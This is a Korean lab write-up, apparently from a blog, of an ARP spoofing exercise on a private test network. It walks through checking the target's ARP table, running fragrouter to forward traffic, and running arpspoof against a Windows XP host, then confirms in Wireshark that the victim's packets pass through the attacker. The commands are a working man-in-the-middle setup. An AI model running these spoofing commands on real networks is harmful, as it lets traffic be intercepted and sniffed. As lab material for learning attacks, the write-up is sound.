- 구성과 계획
- 네트워크 구성도
- 과정 정리
- 관련내용정리
- 실습과정
arp 리다이렉트 공격자
att6 – 192.168.10.148 (00:0C:29:C6:9A:42) / gw
192.168.10.1 (70:5d:cc:04:be:b0)
타겟 정보
winXP – 192.168.10.112 (00:0C:29:AD:73:0C) /
gw192.168.10.1 (70:5d:cc:04:be:b0)
step 1. 타겟 winXP arp
step 2. 공격자 att6 fragrouter 실행
step 3. 공격자 att6 arpspoof 실행
step 4. 경로 패킷 확인
ARP 테이블 : 네트워크 인터페이스 고유번호인 MAC Address를 주소록처럼 저장하여 컴퓨터가 통신할때 사용
fragrouter : 들어온 패킷을 원래의 목적지로 보내주는 라우터기능의 도구
arpspoof : MAC 주소 변조
step 1. 타겟 winXP arp
arp -a 192.168.10.112
공격자 터미널에서 arp를 이용한 상대 MAC주소 확인
step 2. 공격자 att6 fragrouter 실행
fragrouter -B1
라우팅 기능을 하기 위해 공격자 터미널 창을 따로 켜서 실행
step 3. 공격자 att6 arpspoof 실행
arpspoof -i eth0 -t 192.168.10.112 192.168.10.1
공격자 터미널에서 ARP 스푸핑중인 패킷 내용으로 피해자 PC의 MAC 주소 테이블의 게이트웨이를 변조
step 4. 경로 패킷 확인
xp에서
ping을 쏘았을 때 att6에서 wireshark를 이용하여 캡처한 패킷
00 0c 29 c6 9a 42는 att 6 공격자의 주소로 현재 패킷의 도착지이다.
00 0c 29 ad 73 0c는 xp 피해자의 주소로 현재 패킷의 출발지이다.
70 5d cc 04 be b0는 게이트웨이의 주소로 현재 패킷의 도착이다.
00 0c 29 c6 9a 42 는 att6 공격자의 주소로 현재 패킷의 출발지이다.
원래는 xp에서 게이트웨이로 가야하지만 ARP 스푸핑을 당한 상태라 xp의 패킷은 att6을 거쳐 게이트웨이로 나가기 때문에 중간에서 스니핑을 당하고 있는 상태이다.
댓글 없음:
댓글 쓰기